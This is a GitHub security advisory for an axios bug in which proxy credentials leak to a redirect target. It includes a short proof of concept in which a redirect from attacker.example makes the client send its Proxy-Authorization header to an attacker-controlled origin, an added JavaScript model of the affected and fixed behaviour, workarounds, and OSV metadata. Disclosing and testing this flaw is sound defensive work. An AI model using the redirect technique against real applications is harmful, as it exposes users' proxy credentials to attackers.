GHSA-J5F8-GRM9-P9FC
Vulnerability from github – Published: 2026-06-04 14:15 – Updated: 2026-06-04 14:15

Summary
Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target.
This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected.
Impact
An attacker who controls a server that the victim application requests can redirect the request so that the attacker-controlled redirect target receives the victim’s proxy credentials.
The most relevant case is a Node.js application using an authenticated HTTP_PROXY for an initial http:// request, with redirects enabled, where the redirect target resolves to no proxy, such as an https:// URL when HTTPS_PROXY is unset.
This does not affect browser, XHR, or fetch adapter behaviour. It also does not affect requests with maxRedirects: 0.
Affected Functionality
Affected functionality is limited to the Node.js HTTP adapter in lib/adapters/http.js.
Relevant inputs and settings include:
- `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`.
- Authenticated proxy URLs such as `http://user:pass@proxy.example:8080`.
- Automatic redirect following through `follow-redirects`.
- Axios proxy handling in `setProxy()`.
- Redirect proxy handling through `beforeRedirects.proxy`.
Technical Details
In affected v1 releases, setProxy() adds Proxy-Authorization when a proxy with credentials is selected, but redirect handling calls setProxy() again without first clearing any existing proxy authorization header.
If the redirected URL resolves to no proxy, setProxy() does not add a new proxy configuration and also does not remove the old header. The redirected request can therefore carry the stale Proxy-Authorization header to the final origin.
The v1 fix in afca61a adds an isRedirect path that deletes any case variant of Proxy-Authorization before proxy settings are re-applied on redirect. The v0 backport in 2af6116 fixed the 0.x line for 0.32.0.
Proof of Concept of Attack
```js
import axios from 'axios';

// Authenticated proxy configured for http:// targets only; nothing for https://
process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;

// The initial http:// request is proxied; the 302 to https:// is followed directly
await axios.get('http://attacker.example/start');
```

Attacker-controlled HTTP endpoint:

```http
HTTP/1.1 302 Found
Location: https://attacker.example/final
```

Expected result on affected versions:

```text
https://attacker.example/final receives:
Proxy-Authorization: Basic dXNlcjpwYXNz
```

Expected result on fixed versions:

```text
https://attacker.example/final receives no Proxy-Authorization header
```
Workarounds
Set maxRedirects: 0 and handle redirects manually.
Avoid using authenticated proxy environment variables for requests to untrusted HTTP origins unless redirect behaviour is controlled.
Ensure proxy environment variables are configured consistently across protocols so redirects do not unexpectedly change from proxied to direct connections.
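The following is an added example, not code from axios or from the advisory authors. It models the mechanism described under Technical Details (proxy settings re-resolved per hop, with an affected `setProxy` that never removes a stale header and a fixed one that deletes every case variant of `Proxy-Authorization` on redirect) and the last workaround above (auditing proxy environment variables for combinations under which a redirect turns a proxied request into a direct one). The proxy-selection logic, the `NO_PROXY` suffix matching, and the scenario URLs are simplified assumptions constructed for this example; the function names are not axios APIs.

```javascript
// Added example, not axios code: models the redirect/proxy interaction the
// advisory describes, the fix (clear the header before proxy settings are
// re-applied), and a config audit for the risky env-var combination.

// Simplified proxy selection from HTTP_PROXY / HTTPS_PROXY / NO_PROXY.
// Assumption: NO_PROXY is a comma-separated list of host suffixes and "*"
// disables proxying entirely (real-world matching rules vary).
function resolveProxy(env, url) {
  const target = new URL(url);
  const noProxy = (env.NO_PROXY || '').split(',').map(s => s.trim()).filter(Boolean);
  if (noProxy.includes('*')) return null;
  const host = target.hostname;
  const bypass = noProxy.some(s => {
    const suffix = s.replace(/^\./, '');
    return host === suffix || host.endsWith('.' + suffix);
  });
  if (bypass) return null;
  const raw = target.protocol === 'https:' ? env.HTTPS_PROXY : env.HTTP_PROXY;
  if (!raw) return null;
  const p = new URL(raw);
  return { host: p.hostname, port: p.port, username: decodeURIComponent(p.username), password: decodeURIComponent(p.password) };
}

function proxyAuthHeaderKey(headers) {
  return Object.keys(headers).find(k => k.toLowerCase() === 'proxy-authorization');
}

// Affected behaviour: adds the header when a credentialed proxy is selected,
// never removes one left over from a previous hop.
function setProxyVulnerable(headers, proxy) {
  if (proxy && proxy.username) {
    const cred = Buffer.from(`${proxy.username}:${proxy.password}`).toString('base64');
    headers['Proxy-Authorization'] = `Basic ${cred}`;
  }
  return headers;
}

// Fixed behaviour: on a redirect, drop every case variant of the header
// before proxy settings are re-applied for the new URL.
function setProxyFixed(headers, proxy, isRedirect) {
  if (isRedirect) {
    for (const key of Object.keys(headers)) {
      if (key.toLowerCase() === 'proxy-authorization') delete headers[key];
    }
  }
  return setProxyVulnerable(headers, proxy);
}

// Walk the redirect chain, re-resolving the proxy per hop, and record what each
// outgoing request would carry. `redirects` is a constructed map of request
// URL -> Location header standing in for the scenario's servers.
function followRedirects(env, startUrl, redirects, setProxy, maxHops = 10) {
  const headers = {};
  const trace = [];
  let url = startUrl;
  let isRedirect = false;
  for (let hop = 0; hop <= maxHops; hop++) {
    const proxy = resolveProxy(env, url);
    setProxy(headers, proxy, isRedirect);
    const key = proxyAuthHeaderKey(headers);
    trace.push({ url, viaProxy: proxy !== null, proxyAuthorization: key === undefined ? undefined : headers[key] });
    if (!(url in redirects)) break;
    url = redirects[url];
    isRedirect = true;
  }
  return trace;
}

// The leak condition: a direct (unproxied) request that still carries
// Proxy-Authorization, so the origin rather than the proxy receives it.
function leaksProxyCredential(trace) {
  return trace.some(hop => !hop.viaProxy && hop.proxyAuthorization !== undefined);
}

// Config audit for the "configure proxy variables consistently" workaround:
// flag credentialed settings under which a cross-scheme redirect or a
// NO_PROXY match would turn a proxied request into a direct one.
function auditProxyEnv(env) {
  const hasCreds = v => Boolean(v) && new URL(v).username !== '';
  const warnings = [];
  if (hasCreds(env.HTTP_PROXY) && !env.HTTPS_PROXY) {
    warnings.push('HTTP_PROXY has credentials but HTTPS_PROXY is unset: an http:// -> https:// redirect goes direct');
  }
  if (hasCreds(env.HTTPS_PROXY) && !env.HTTP_PROXY) {
    warnings.push('HTTPS_PROXY has credentials but HTTP_PROXY is unset: an https:// -> http:// redirect goes direct');
  }
  if ((hasCreds(env.HTTP_PROXY) || hasCreds(env.HTTPS_PROXY)) && env.NO_PROXY) {
    warnings.push('credentialed proxy with NO_PROXY set: a redirect to an excluded host goes direct');
  }
  return warnings;
}

// Constructed scenario matching the advisory: authenticated HTTP_PROXY,
// no HTTPS_PROXY, and an http:// origin that redirects to https://.
const scenarioEnv = { HTTP_PROXY: 'http://user:pass@127.0.0.1:8080' };
const scenarioRedirects = { 'http://attacker.example/start': 'https://attacker.example/final' };
console.log('affected:', followRedirects(scenarioEnv, 'http://attacker.example/start', scenarioRedirects, setProxyVulnerable));
console.log('fixed:', followRedirects(scenarioEnv, 'http://attacker.example/start', scenarioRedirects, setProxyFixed));
console.log('audit:', auditProxyEnv(scenarioEnv));
```

Running the script prints two traces: under the affected `setProxy` the second hop is unproxied yet still carries `Basic dXNlcjpwYXNz`, while under the fixed variant the header is gone. `auditProxyEnv` returns the single warning that matches the advisory's "most relevant case"; the same model also reproduces the `NO_PROXY` exclusion path mentioned in the original report.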
Original Source

### Summary

Axios' Node.js HTTP adapter can leak proxy credentials to a redirect target origin. When an initial request is sent through an authenticated HTTP proxy, Axios adds a `Proxy-Authorization` header. On redirect, Axios re-evaluates proxy settings, but if the redirected request no longer uses a proxy, the stale `Proxy-Authorization` header is not cleared. As a result, the redirect target can receive the proxy credential directly.

This issue affects the Node.js HTTP adapter and can be reproduced when the initial request uses `HTTP_PROXY` with authentication, redirects are enabled, and the redirected request is resolved to no proxy, such as when `HTTPS_PROXY` is unset or the redirect target is excluded by `NO_PROXY`.

### Details

In the current implementation:

- `setProxy()` adds `Proxy-Authorization` when a proxy with credentials is in use.
- On redirects, Axios re-invokes `setProxy()` for the redirected request.
- If the redirected URL re-evaluates to "no proxy", `setProxy()` does not clear the previously added `Proxy-Authorization` header.
- The redirected request therefore reuses the stale header and sends it to the final origin.

Relevant code locations:

- `lib/adapters/http.js`
- `setProxy()` adds `Proxy-Authorization`
- redirect handling re-applies proxy logic through `beforeRedirects.proxy`
- no cleanup is performed when the recomputed redirect request no longer uses a proxy

### PoC

1. The victim sends `GET http://<attacker-site>/start`
2. The request goes through a local authenticated `corp proxy`
3. The attacker-controlled HTTP endpoint returns `302 Location: https://<attacker-site>/final`
4. The redirected HTTPS request no longer uses a proxy
5. The attacker-controlled HTTPS endpoint receives the stale `Proxy-Authorization` header

Observed output:

```text
[corp-proxy] Proxy-Authorization received: Basic dXNlcjpwYXNz
[attacker-http] GET /start
[attacker-https] GET /final
[attacker-https] Proxy-Authorization received: Basic dXNlcjpwYXNz
Leak reproduced: Proxy-Authorization was sent to the attacker HTTPS origin.
```

This demonstrates that the proxy credential is exposed to the redirect target origin.
### Impact
Exposes authenticated proxy credentials to an attacker-controlled origin.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.16.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.31.1"
},
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.32.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44486"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-04T14:15:01Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nAxios\u2019 Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a `Proxy-Authorization` header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale `Proxy-Authorization` header can remain on the redirected request and be sent to the redirect target.\n\nThis affects Node.js\u0027s use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected.\n\n### Impact\n\nAn attacker who controls a server that the victim application requests can redirect the request so that the attacker-controlled redirect target receives the victim\u2019s proxy credentials.\n\nThe most relevant case is a Node.js application using an authenticated `HTTP_PROXY` for an initial `http://` request, with redirects enabled, where the redirect target resolves to no proxy, such as an `https://` URL when `HTTPS_PROXY` is unset.\n\nThis does not affect browser, XHR, or fetch adapter behaviour. 
It also does not affect requests with `maxRedirects: 0`.\n\n### Affected Functionality\n\nAffected functionality is limited to the Node.js HTTP adapter in `lib/adapters/http.js`.\n\nRelevant inputs and settings include:\n\n- `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`.\n- Authenticated proxy URLs such as `http://user:pass@proxy.example:8080`.\n- Automatic redirect following through `follow-redirects`.\n- Axios proxy handling in `setProxy()`.\n- Redirect proxy handling through `beforeRedirects.proxy`.\n\n### Technical Details\n\nIn affected v1 releases, `setProxy()` adds `Proxy-Authorization` when a proxy with credentials is selected, but redirect handling calls `setProxy()` again without first clearing any existing proxy authorization header.\n\nIf the redirected URL resolves to no proxy, `setProxy()` does not add a new proxy configuration and also does not remove the old header. The redirected request can therefore carry the stale `Proxy-Authorization` header to the final origin.\n\nThe v1 fix in `afca61a` adds an `isRedirect` path that deletes any case variant of `Proxy-Authorization` before proxy settings are re-applied on redirect. 
The v0 backport in `2af6116` fixed the 0.x line for `0.32.0`.\n\n### Proof of Concept of Attack\n\n```js\nprocess.env.HTTP_PROXY = \u0027http://user:pass@127.0.0.1:8080\u0027;\ndelete process.env.HTTPS_PROXY;\n\nawait axios.get(\u0027http://attacker.example/start\u0027);\n```\n\nAttacker-controlled HTTP endpoint:\n\n```http\nHTTP/1.1 302 Found\nLocation: https://attacker.example/final\n```\n\nExpected result on affected versions:\n\n```text\nhttps://attacker.example/final receives:\nProxy-Authorization: Basic dXNlcjpwYXNz\n```\n\nExpected result on fixed versions:\n\n```text\nhttps://attacker.example/final receives no Proxy-Authorization header\n```\n\n### Workarounds\n\nSet `maxRedirects: 0` and handle redirects manually.\n\nAvoid using authenticated proxy environment variables for requests to untrusted HTTP origins unless redirect behaviour is controlled.\n\nEnsure proxy environment variables are configured consistently across protocols so redirects do not unexpectedly change from proxied to direct connections.\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Source\u003c/summary\u003e\n\n### Summary\nAxios\u0027 Node.js HTTP adapter can leak proxy credentials to a redirect target origin. When an initial request is sent through an authenticated HTTP proxy, Axios adds a `Proxy-Authorization` header. On redirect, Axios re-evaluates proxy settings, but if the redirected request no longer uses a proxy, the stale `Proxy-Authorization` header is not cleared. 
As a result, the redirect target can receive the proxy credential directly.\n\nThis issue affects the Node.js HTTP adapter and can be reproduced when the initial request uses `HTTP_PROXY` with authentication, redirects are enabled, and the redirected request is resolved to no proxy, such as when `HTTPS_PROXY` is unset or the redirect target is excluded by `NO_PROXY`.\n\n### Details\nIn the current implementation:\n\n- `setProxy()` adds `Proxy-Authorization` when a proxy with credentials is in use.\n- On redirects, Axios re-invokes `setProxy()` for the redirected request.\n- If the redirected URL re-evaluates to \"no proxy\", `setProxy()` does not clear the previously added `Proxy-Authorization` header.\n- The redirected request therefore reuses the stale header and sends it to the final origin.\n\nRelevant code locations:\n\n- `lib/adapters/http.js`\n- `setProxy()` adds `Proxy-Authorization`\n- redirect handling re-applies proxy logic through `beforeRedirects.proxy`\n- no cleanup is performed when the recomputed redirect request no longer uses a proxy\n\n### PoC\n1. The victim sends `GET http://\u003cattacker-site\u003e/start`\n2. The request goes through a local authenticated `corp proxy`\n3. The attacker-controlled HTTP endpoint returns `302 Location: https://\u003cattacker-site\u003e/final`\n4. The redirected HTTPS request no longer uses a proxy\n5. The attacker-controlled HTTPS endpoint receives the stale `Proxy-Authorization` header\n\nObserved output:\n\n```text\n[corp-proxy] Proxy-Authorization received: Basic dXNlcjpwYXNz\n[attacker-http] GET /start\n[attacker-https] GET /final\n[attacker-https] Proxy-Authorization received: Basic dXNlcjpwYXNz\nLeak reproduced: Proxy-Authorization was sent to the attacker HTTPS origin.\n```\n\nThis demonstrates that the proxy credential is exposed to the redirect target origin.\n\n### Impact\nExposes authenticated proxy credentials to an attacker-controlled origin.\n\u003c/details\u003e\n\n---",
"id": "GHSA-j5f8-grm9-p9fc",
"modified": "2026-06-04T14:15:01Z",
"published": "2026-06-04T14:15:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-j5f8-grm9-p9fc"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/10794"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/afca61a070728e717203c2bc21e7b589b59b858b"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v0.32.0"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v1.16.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Axios: Proxy-Authorization header leaks to redirect target when proxy is re-evaluated to direct connection"
}